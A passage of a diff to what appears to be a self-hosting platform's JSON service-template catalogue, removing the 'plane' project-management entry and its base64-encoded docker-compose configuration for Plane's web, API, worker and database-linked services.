Z2VudCcKICAgICAgLSAnYmVzemVsX3NvY2tldDovYmVzemVsX3NvY2tldCcKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2s6cm8nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gL2FnZW50CiAgICAgICAgLSBoZWFsdGgKICAgICAgaW50ZXJ2YWw6IDYwcwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgICAgc3RhcnRfcGVyaW9kOiA1cwo=",
         "tags": [
             "beszel",
             "monitoring",
@@ -3658,27 +3658,6 @@
         "minversion": "0.0.0",
         "port": "80"
     },
-    "plane": {
-        "documentation": "https://docs.plane.so/self-hosting/methods/docker-compose?utm_source=coolify.io",
-        "slogan": "The open source project management tool",
-        "compose": "eC1kYi1lbnY6CiAgUEdIT1NUOiBwbGFuZS1kYgogIFBHREFUQUJBU0U6IHBsYW5lCiAgUE9TVEdSRVNfVVNFUjogJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogIFBPU1RHUkVTX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogIFBPU1RHUkVTX0RCOiBwbGFuZQogIFBPU1RHUkVTX1BPUlQ6IDU0MzIKICBQR0RBVEE6IC92YXIvbGliL3Bvc3RncmVzcWwvZGF0YQp4LXJlZGlzLWVudjoKICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgUkVESVNfUE9SVDogJyR7UkVESVNfUE9SVDotNjM3OX0nCiAgUkVESVNfVVJMOiAnJHtSRURJU19VUkw6LXJlZGlzOi8vcGxhbmUtcmVkaXM6NjM3OS99Jwp4LW1pbmlvLWVudjoKICBNSU5JT19ST09UX1VTRVI6ICRTRVJWSUNFX1VTRVJfTUlOSU8KICBNSU5JT19ST09UX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwp4LWF3cy1zMy1lbnY6CiAgQVdTX1JFR0lPTjogJyR7QVdTX1JFR0lPTjotfScKICBBV1NfQUNDRVNTX0tFWV9JRDogJFNFUlZJQ0VfVVNFUl9NSU5JTwogIEFXU19TRUNSRVRfQUNDRVNTX0tFWTogJFNFUlZJQ0VfUEFTU1dPUkRfTUlOSU8KICBBV1NfUzNfRU5EUE9JTlRfVVJMOiAnJHtBV1NfUzNfRU5EUE9JTlRfVVJMOi1odHRwOi8vcGxhbmUtbWluaW86OTAwMH0nCiAgQVdTX1MzX0JVQ0tFVF9OQU1FOiAnJHtBV1NfUzNfQlVDS0VUX05BTUU6LXVwbG9hZHN9Jwp4LW1xLWVudjoKICBSQUJCSVRNUV9IT1NUOiBwbGFuZS1tcQogIFJBQkJJVE1RX1BPUlQ6ICcke1JBQkJJVE1RX1BPUlQ6LTU2NzJ9JwogIFJBQkJJVE1RX0RFRkFVTFRfVVNFUjogJyR7U0VSVklDRV9VU0VSX1JBQkJJVE1ROi1wbGFuZX0nCiAgUkFCQklUTVFfREVGQVVMVF9QQVNTOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1ROi1wbGFuZX0nCiAgUkFCQklUTVFfREVGQVVMVF9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKICBSQUJCSVRNUV9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKeC1saXZlLWVudjoKICBBUElfQkFTRV9VUkw6ICcke0FQSV9CQVNFX1VSTDotaHR0cDovL2FwaTo4MDAwfScKeC1hcHAtZW52OgogIEFQUF9SRUxFQVNFOiAnJHtBUFBfUkVMRUFTRTotdjEuMC4wfScKICBXRUJfVVJMOiAnJHtTRVJWSUNFX1VSTF9QTEFORX0nCiAgREVCVUc6ICcke0RFQlVHOi0wfScKICBDT1JTX0FMTE9XRURfT1JJR0lOUzogJyR7Q09SU19BTExPV0VEX09SSUdJTlM6LWh0dHA6Ly9sb2NhbGhvc3R9JwogIEdVTklDT1JOX1dPUktFUlM6ICcke0dVTklDT1JOX1dPUktFUlM6LTF9JwogIFVTRV9NSU5JTzogJyR7VVNFX01JTklPOi0xfScKICBEQVRBQkFTRV9VUkw6ICdwb3N0Z3Jlc3FsOi8vJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUzokU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU0BwbGFuZS1kYi9wbGFuZScKICBTRUNSRVRfS0VZOiAkU0VSVklDRV9QQVNTV09SRF82NF9TRUNSRVRLRVkKICBBTVFQX1VSTDogJ2FtcXA6Ly8ke1NFUlZJQ0VfVVNFUl9SQUJCSVRNUX06JHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1RfUBwbGFuZS1tcToke1JBQkJJVE1RX1BPUlQ6LTU2NzJ9L3BsYW5lJwogIEFQSV9LRVlfUkFURV9MSU1JVDogJyR7QVBJX0tFWV9SQVRFX0xJTUlUOi02MC9taW51dGV9JwogIE1JTklPX0VORFBPSU5UX1NTTDogJyR7TUlOSU9fRU5EUE9JTlRfU1NMOi0wfScKc2VydmljZXM6CiAgcHJveHk6CiAgICBpbWFnZTogJ2FydGlmYWN0cy5wbGFuZS5zby9tYWtlcGxhbmUvcGxhbmUtcHJveHk6JHtBUFBfUkVMRUFTRTotdjEuMC4wfScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX1BMQU5FCiAgICAgIC0gJ0FQUF9ET01BSU49JHtTRVJWSUNFX1VSTF9QTEFORX0nCiAgICAgIC0gJ1NJVEVfQUREUkVTUz06ODAnCiAgICAgIC0gJ0ZJTEVfU0laRV9MSU1JVD0ke0ZJTEVfU0laRV9MSU1JVDotNTI0Mjg4MH0nCiAgICAgIC0gJ0JVQ0tFVF9OQU1FPSR7QVdTX1MzX0JVQ0tFVF9OQU1FOi11cGxvYWRzfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gd2ViCiAgICAgIC0gYXBpCiAgICAgIC0gc3BhY2UKICAgICAgLSBhZG1pbgogICAgICAtIGxpdmUKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4MCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIHdlYjoKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1mcm9udGVuZDoke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBhcGkKICAgICAgLSB3b3JrZXIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnd2dldCAtcU8tIGh0dHA6Ly9gaG9zdG5hbWVgOjMwMDAnCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUKICBzcGFjZToKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1zcGFjZToke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBhcGkKICAgICAgLSB3b3JrZXIKICAgICAgLSB3ZWIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSAnaGV5IHdoYXRzIHVwJwogICAgICBpbnRlcnZhbDogMnMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1CiAgYWRtaW46CiAgICBpbWFnZTogJ2FydGlmYWN0cy5wbGFuZS5zby9tYWtlcGxhbmUvcGxhbmUtYWRtaW46JHtBUFBfUkVMRUFTRTotdjEuMC4wfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gYXBpCiAgICAgIC0gd2ViCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gJ2hleSB3aGF0cyB1cCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIGxpdmU6CiAgICBpbWFnZTogJ2FydGlmYWN0cy5wbGFuZS5zby9tYWtlcGxhbmUvcGxhbmUtbGl2ZToke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIEFQSV9CQVNFX1VSTDogJyR7QVBJX0JBU0VfVVJMOi1odHRwOi8vYXBpOjgwMDB9JwogICAgICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgICAgIFJFRElTX1BPUlQ6ICcke1JFRElTX1BPUlQ6LTYzNzl9JwogICAgICBSRURJU19VUkw6ICcke1JFRElTX1VSTDotcmVkaXM6Ly9wbGFuZS1yZWRpczo2Mzc5L30nCiAgICBkZXBlbmRzX29uOgogICAgICAtIGFwaQogICAgICAtIHdlYgogICAgICAtIHBsYW5lLXJlZGlzCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gJ2hleSB3aGF0cyB1cCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIGFwaToKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1iYWNrZW5kOiR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICBjb21tYW5kOiAuL2Jpbi9kb2NrZXItZW50cnlwb2ludC1hcGkuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xvZ3NfYXBpOi9jb2RlL3BsYW5lL2xvZ3MnCiAgICBlbnZpcm9ubWVudDoKICAgICAgQVBQX1JFTEVBU0U6ICcke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgICBXRUJfVVJMOiAnJHtTRVJWSUNFX1VSTF9QTEFORX0nCiAgICAgIERFQlVHOiAnJHtERUJVRzotMH0nCiAgICAgIENPUlNfQUxMT1dFRF9PUklHSU5TOiAnJHtDT1JTX0FMTE9XRURfT1JJR0lOUzotaHR0cDovL2xvY2FsaG9zdH0nCiAgICAgIEdVTklDT1JOX1dPUktFUlM6ICcke0dVTklDT1JOX1dPUktFUlM6LTF9JwogICAgICBVU0VfTUlOSU86ICcke1VTRV9NSU5JTzotMX0nCiAgICAgIERBVEFCQVNFX1VSTDogJ3Bvc3RncmVzcWw6Ly8kU0VSVklDRV9VU0VSX1BPU1RHUkVTOiRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTQHBsYW5lLWRiL3BsYW5lJwogICAgICBTRUNSRVRfS0VZOiAkU0VSVklDRV9QQVNTV09SRF82NF9TRUNSRVRLRVkKICAgICAgQU1RUF9VUkw6ICdhbXFwOi8vJHtTRVJWSUNFX1VTRVJfUkFCQklUTVF9OiR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUX1AcGxhbmUtbXE6JHtSQUJCSVRNUV9QT1JUOi01NjcyfS9wbGFuZScKICAgICAgQVBJX0tFWV9SQVRFX0xJTUlUOiAnJHtBUElfS0VZX1JBVEVfTElNSVQ6LTYwL21pbnV0ZX0nCiAgICAgIE1JTklPX0VORFBPSU5UX1NTTDogJyR7TUlOSU9fRU5EUE9JTlRfU1NMOi0wfScKICAgICAgUEdIT1NUOiBwbGFuZS1kYgogICAgICBQR0RBVEFCQVNFOiBwbGFuZQogICAgICBQT1NUR1JFU19VU0VSOiAkU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICBQT1NUR1JFU19EQjogcGxhbmUKICAgICAgUE9TVEdSRVNfUE9SVDogNTQzMgogICAgICBQR0RBVEE6IC92YXIvbGliL3Bvc3RncmVzcWwvZGF0YQogICAgICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgICAgIFJFRElTX1BPUlQ6ICcke1JFRElTX1BPUlQ6LTYzNzl9JwogICAgICBSRURJU19VUkw6ICcke1JFRElTX1VSTDotcmVkaXM6Ly9wbGFuZS1yZWRpczo2Mzc5L30nCiAgICAgIE1JTklPX1JPT1RfVVNFUjogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBNSU5JT19ST09UX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwogICAgICBBV1NfUkVHSU9OOiAnJHtBV1NfUkVHSU9OOi19JwogICAgICBBV1NfQUNDRVNTX0tFWV9JRDogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICRTRVJWSUNFX1BBU1NXT1JEX01JTklPCiAgICAgIEFXU19TM19FTkRQT0lOVF9VUkw6ICcke0FXU19TM19FTkRQT0lOVF9VUkw6LWh0dHA6Ly9wbGFuZS1taW5pbzo5MDAwfScKICAgICAgQVdTX1MzX0JVQ0tFVF9OQU1FOiAnJHtBV1NfUzNfQlVDS0VUX05BTUU6LXVwbG9hZHN9JwogICAgICBSQUJCSVRNUV9IT1NUOiBwbGFuZS1tcQogICAgICBSQUJCSVRNUV9QT1JUOiAnJHtSQUJCSVRNUV9QT1JUOi01NjcyfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9VU0VSOiAnJHtTRVJWSUNFX1VTRVJfUkFCQklUTVE6LXBsYW5lfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9QQVNTOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVkhPU1Q6ICcke1JBQkJJVE1RX1ZIT1NUOi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBwbGFuZS1kYgogICAgICAtIHBsYW5lLXJlZGlzCiAgICAgIC0gcGxhbmUtbXEKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSAnaGV5IHdoYXRzIHVwJwogICAgICBpbnRlcnZhbDogMnMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1CiAgd29ya2VyOgogICAgaW1hZ2U6ICdhcnRpZmFjdHMucGxhbmUuc28vbWFrZXBsYW5lL3BsYW5lLWJhY2tlbmQ6JHtBUFBfUkVMRUFTRTotdjEuMC4wfScKICAgIGNvbW1hbmQ6IC4vYmluL2RvY2tlci1lbnRyeXBvaW50LXdvcmtlci5zaAogICAgdm9sdW1lczoKICAgICAgLSAnbG9nc193b3JrZXI6L2NvZGUvcGxhbmUvbG9ncycKICAgIGVudmlyb25tZW50OgogICAgICBBUFBfUkVMRUFTRTogJyR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICAgIFdFQl9VUkw6ICcke1NFUlZJQ0VfVVJMX1BMQU5FfScKICAgICAgREVCVUc6ICcke0RFQlVHOi0wfScKICAgICAgQ09SU19BTExPV0VEX09SSUdJTlM6ICcke0NPUlNfQUxMT1dFRF9PUklHSU5TOi1odHRwOi8vbG9jYWxob3N0fScKICAgICAgR1VOSUNPUk5fV09SS0VSUzogJyR7R1VOSUNPUk5fV09SS0VSUzotMX0nCiAgICAgIFVTRV9NSU5JTzogJyR7VVNFX01JTklPOi0xfScKICAgICAgREFUQUJBU0VfVVJMOiAncG9zdGdyZXNxbDovLyRTRVJWSUNFX1VTRVJfUE9TVEdSRVM6JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVNAcGxhbmUtZGIvcGxhbmUnCiAgICAgIFNFQ1JFVF9LRVk6ICRTRVJWSUNFX1BBU1NXT1JEXzY0X1NFQ1JFVEtFWQogICAgICBBTVFQX1VSTDogJ2FtcXA6Ly8ke1NFUlZJQ0VfVVNFUl9SQUJCSVRNUX06JHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1RfUBwbGFuZS1tcToke1JBQkJJVE1RX1BPUlQ6LTU2NzJ9L3BsYW5lJwogICAgICBBUElfS0VZX1JBVEVfTElNSVQ6ICcke0FQSV9LRVlfUkFURV9MSU1JVDotNjAvbWludXRlfScKICAgICAgTUlOSU9fRU5EUE9JTlRfU1NMOiAnJHtNSU5JT19FTkRQT0lOVF9TU0w6LTB9JwogICAgICBQR0hPU1Q6IHBsYW5lLWRiCiAgICAgIFBHREFUQUJBU0U6IHBsYW5lCiAgICAgIFBPU1RHUkVTX1VTRVI6ICRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgUE9TVEdSRVNfUEFTU1dPUkQ6ICRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX0RCOiBwbGFuZQogICAgICBQT1NUR1JFU19QT1JUOiA1NDMyCiAgICAgIFBHREFUQTogL3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhCiAgICAgIFJFRElTX0hPU1Q6ICcke1JFRElTX0hPU1Q6LXBsYW5lLXJlZGlzfScKICAgICAgUkVESVNfUE9SVDogJyR7UkVESVNfUE9SVDotNjM3OX0nCiAgICAgIFJFRElTX1VSTDogJyR7UkVESVNfVVJMOi1yZWRpczovL3BsYW5lLXJlZGlzOjYzNzkvfScKICAgICAgTUlOSU9fUk9PVF9VU0VSOiAkU0VSVklDRV9VU0VSX01JTklPCiAgICAgIE1JTklPX1JPT1RfUEFTU1dPUkQ6ICRTRVJWSUNFX1BBU1NXT1JEX01JTklPCiAgICAgIEFXU19SRUdJT046ICcke0FXU19SRUdJT046LX0nCiAgICAgIEFXU19BQ0NFU1NfS0VZX0lEOiAkU0VSVklDRV9VU0VSX01JTklPCiAgICAgIEFXU19TRUNSRVRfQUNDRVNTX0tFWTogJFNFUlZJQ0VfUEFTU1dPUkRfTUlOSU8KICAgICAgQVdTX1MzX0VORFBPSU5UX1VSTDogJyR7QVdTX1MzX0VORFBPSU5UX1VSTDotaHR0cDovL3BsYW5lLW1pbmlvOjkwMDB9JwogICAgICBBV1NfUzNfQlVDS0VUX05BTUU6ICcke0FXU19TM19CVUNLRVRfTkFNRTotdXBsb2Fkc30nCiAgICAgIFJBQkJJVE1RX0hPU1Q6IHBsYW5lLW1xCiAgICAgIFJBQkJJVE1RX1BPUlQ6ICcke1JBQkJJVE1RX1BPUlQ6LTU2NzJ9JwogICAgICBSQUJCSVRNUV9ERUZBVUxUX1VTRVI6ICcke1NFUlZJQ0VfVVNFUl9SQUJCSVRNUTotcGxhbmV9JwogICAgICBSQUJCSVRNUV9ERUZBVUxUX1BBU1M6ICcke1NFUlZJQ0VfUEFTU1dPUkRfUkFCQklUTVE6LXBsYW5lfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKICAgICAgUkFCQklUTVFfVkhPU1Q6ICcke1JBQkJJVE1RX1ZIT1NUOi1wbGFuZX0nCiAgICBkZXBlbmRzX29uOgogICAgICAtIGFwaQogICAgICAtIHBsYW5lLWRiCiAgICAgIC0gcGxhbmUtcmVkaXMKICAgICAgLSBwbGFuZS1tcQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGVjaG8KICAgICAgICAtICdoZXkgd2hhdHMgdXAnCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUKICBiZWF0LXdvcmtlcjoKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1iYWNrZW5kOiR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICBjb21tYW5kOiAuL2Jpbi9kb2NrZXItZW50cnlwb2ludC1iZWF0LnNoCiAgICB2b2x1bWVzOgogICAgICAtICdsb2dzX2JlYXQtd29ya2VyOi9jb2RlL3BsYW5lL2xvZ3MnCiAgICBlbnZpcm9ubWVudDoKICAgICAgQVBQX1JFTEVBU0U6ICcke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgICBXRUJfVVJMOiAnJHtTRVJWSUNFX1VSTF9QTEFORX0nCiAgICAgIERFQlVHOiAnJHtERUJVRzotMH0nCiAgICAgIENPUlNfQUxMT1dFRF9PUklHSU5TOiAnJHtDT1JTX0FMTE9XRURfT1JJR0lOUzotaHR0cDovL2xvY2FsaG9zdH0nCiAgICAgIEdVTklDT1JOX1dPUktFUlM6ICcke0dVTklDT1JOX1dPUktFUlM6LTF9JwogICAgICBVU0VfTUlOSU86ICcke1VTRV9NSU5JTzotMX0nCiAgICAgIERBVEFCQVNFX1VSTDogJ3Bvc3RncmVzcWw6Ly8kU0VSVklDRV9VU0VSX1BPU1RHUkVTOiRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTQHBsYW5lLWRiL3BsYW5lJwogICAgICBTRUNSRVRfS0VZOiAkU0VSVklDRV9QQVNTV09SRF82NF9TRUNSRVRLRVkKICAgICAgQU1RUF9VUkw6ICdhbXFwOi8vJHtTRVJWSUNFX1VTRVJfUkFCQklUTVF9OiR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUX1AcGxhbmUtbXE6JHtSQUJCSVRNUV9QT1JUOi01NjcyfS9wbGFuZScKICAgICAgQVBJX0tFWV9SQVRFX0xJTUlUOiAnJHtBUElfS0VZX1JBVEVfTElNSVQ6LTYwL21pbnV0ZX0nCiAgICAgIE1JTklPX0VORFBPSU5UX1NTTDogJyR7TUlOSU9fRU5EUE9JTlRfU1NMOi0wfScKICAgICAgUEdIT1NUOiBwbGFuZS1kYgogICAgICBQR0RBVEFCQVNFOiBwbGFuZQogICAgICBQT1NUR1JFU19VU0VSOiAkU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICBQT1NUR1JFU19EQjogcGxhbmUKICAgICAgUE9TVEdSRVNfUE9SVDogNTQzMgogICAgICBQR0RBVEE6IC92YXIvbGliL3Bvc3RncmVzcWwvZGF0YQogICAgICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgICAgIFJFRElTX1BPUlQ6ICcke1JFRElTX1BPUlQ6LTYzNzl9JwogICAgICBSRURJU19VUkw6ICcke1JFRElTX1VSTDotcmVkaXM6Ly9wbGFuZS1yZWRpczo2Mzc5L30nCiAgICAgIE1JTklPX1JPT1RfVVNFUjogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBNSU5JT19ST09UX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwogICAgICBBV1NfUkVHSU9OOiAnJHtBV1NfUkVHSU9OOi19JwogICAgICBBV1NfQUNDRVNTX0tFWV9JRDogJFNFUlZJQ0VfVVNFUl9NSU5JTwogICAgICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICRTRVJWSUNFX1BBU1NXT1JEX01JTklPCiAgICAgIEFXU19TM19FTkRQT0lOVF9VUkw6ICcke0FXU19TM19FTkRQT0lOVF9VUkw6LWh0dHA6Ly9wbGFuZS1taW5pbzo5MDAwfScKICAgICAgQVdTX1MzX0JVQ0tFVF9OQU1FOiAnJHtBV1NfUzNfQlVDS0VUX05BTUU6LXVwbG9hZHN9JwogICAgICBSQUJCSVRNUV9IT1NUOiBwbGFuZS1tcQogICAgICBSQUJCSVRNUV9QT1JUOiAnJHtSQUJCSVRNUV9QT1JUOi01NjcyfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9VU0VSOiAnJHtTRVJWSUNFX1VTRVJfUkFCQklUTVE6LXBsYW5lfScKICAgICAgUkFCQklUTVFfREVGQVVMVF9QQVNTOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVkhPU1Q6ICcke1JBQkJJVE1RX1ZIT1NUOi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBhcGkKICAgICAgLSBwbGFuZS1kYgogICAgICAtIHBsYW5lLXJlZGlzCiAgICAgIC0gcGxhbmUtbXEKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSAnaGV5IHdoYXRzIHVwJwogICAgICBpbnRlcnZhbDogMnMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1CiAgbWlncmF0b3I6CiAgICBpbWFnZTogJ2FydGlmYWN0cy5wbGFuZS5zby9tYWtlcGxhbmUvcGxhbmUtYmFja2VuZDoke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgcmVzdGFydDogJ25vJwogICAgY29tbWFuZDogLi9iaW4vZG9ja2VyLWVudHJ5cG9pbnQtbWlncmF0b3Iuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xvZ3NfbWlncmF0b3I6L2NvZGUvcGxhbmUvbG9ncycKICAgIGVudmlyb25tZW50OgogICAgICBBUFBfUkVMRUFTRTogJyR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICAgIFdFQl9VUkw6ICcke1NFUlZJQ0VfVVJMX1BMQU5FfScKICAgICAgREVCVUc6ICcke0RFQlVHOi0wfScKICAgICAgQ09SU19BTExPV0VEX09SSUdJTlM6ICcke0NPUlNfQUxMT1dFRF9PUklHSU5TOi1odHRwOi8vbG9jYWxob3N0fScKICAgICAgR1VOSUNPUk5fV09SS0VSUzogJyR7R1VOSUNPUk5fV09SS0VSUzotMX0nCiAgICAgIFVTRV9NSU5JTzogJyR7VVNFX01JTklPOi0xfScKICAgICAgREFUQUJBU0VfVVJMOiAncG9zdGdyZXNxbDovLyRTRVJWSUNFX1VTRVJfUE9TVEdSRVM6JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVNAcGxhbmUtZGIvcGxhbmUnCiAgICAgIFNFQ1JFVF9LRVk6ICRTRVJWSUNFX1BBU1NXT1JEXzY0X1NFQ1JFVEtFWQogICAgICBBTVFQX1VSTDogJ2FtcXA6Ly8ke1NFUlZJQ0VfVVNFUl9SQUJCSVRNUX06JHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1RfUBwbGFuZS1tcToke1JBQkJJVE1RX1BPUlQ6LTU2NzJ9L3BsYW5lJwogICAgICBBUElfS0VZX1JBVEVfTElNSVQ6ICcke0FQSV9LRVlfUkFURV9MSU1JVDotNjAvbWludXRlfScKICAgICAgTUlOSU9fRU5EUE9JTlRfU1NMOiAnJHtNSU5JT19FTkRQT0lOVF9TU0w6LTB9JwogICAgICBQR0hPU1Q6IHBsYW5lLWRiCiAgICAgIFBHREFUQUJBU0U6IHBsYW5lCiAgICAgIFBPU1RHUkVTX1VTRVI6ICRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgUE9TVEdSRVNfUEFTU1dPUkQ6ICRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIFBPU1RHUkVTX0RCOiBwbGFuZQogICAgICBQT1NUR1JFU19QT1JUOiA1NDMyCiAgICAgIFBHREFUQTogL3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhCiAgICAgIFJFRElTX0hPU1Q6ICcke1JFRElTX0hPU1Q6LXBsYW5lLXJlZGlzfScKICAgICAgUkVESVNfUE9SVDogJyR7UkVESVNfUE9SVDotNjM3OX0nCiAgICAgIFJFRElTX1VSTDogJyR7UkVESVNfVVJMOi1yZWRpczovL3BsYW5lLXJlZGlzOjYzNzkvfScKICAgICAgTUlOSU9fUk9PVF9VU0VSOiAkU0VSVklDRV9VU0VSX01JTklPCiAgICAgIE1JTklPX1JPT1RfUEFTU1dPUkQ6ICRTRVJWSUNFX1BBU1NXT1JEX01JTklPCiAgICAgIEFXU19SRUdJT046ICcke0FXU19SRUdJT046LX0nCiAgICAgIEFXU19BQ0NFU1NfS0VZX0lEOiAkU0VSVklDRV9VU0VSX01JTklPCiAgICAgIEFXU19TRUNSRVRfQUNDRVNTX0tFWTogJFNFUlZJQ0VfUEFTU1dPUkRfTUlOSU8KICAgICAgQVdTX1MzX0VORFBPSU5UX1VSTDogJyR7QVdTX1MzX0VORFBPSU5UX1VSTDotaHR0cDovL3BsYW5lLW1pbmlvOjkwMDB9JwogICAgICBBV1NfUzNfQlVDS0VUX05BTUU6ICcke0FXU19TM19CVUNLRVRfTkFNRTotdXBsb2Fkc30nCiAgICAgIFJBQkJJVE1RX0hPU1Q6IHBsYW5lLW1xCiAgICAgIFJBQkJJVE1RX1BPUlQ6ICcke1JBQkJJVE1RX1BPUlQ6LTU2NzJ9JwogICAgICBSQUJCSVRNUV9ERUZBVUxUX1VTRVI6ICcke1NFUlZJQ0VfVVNFUl9SQUJCSVRNUTotcGxhbmV9JwogIC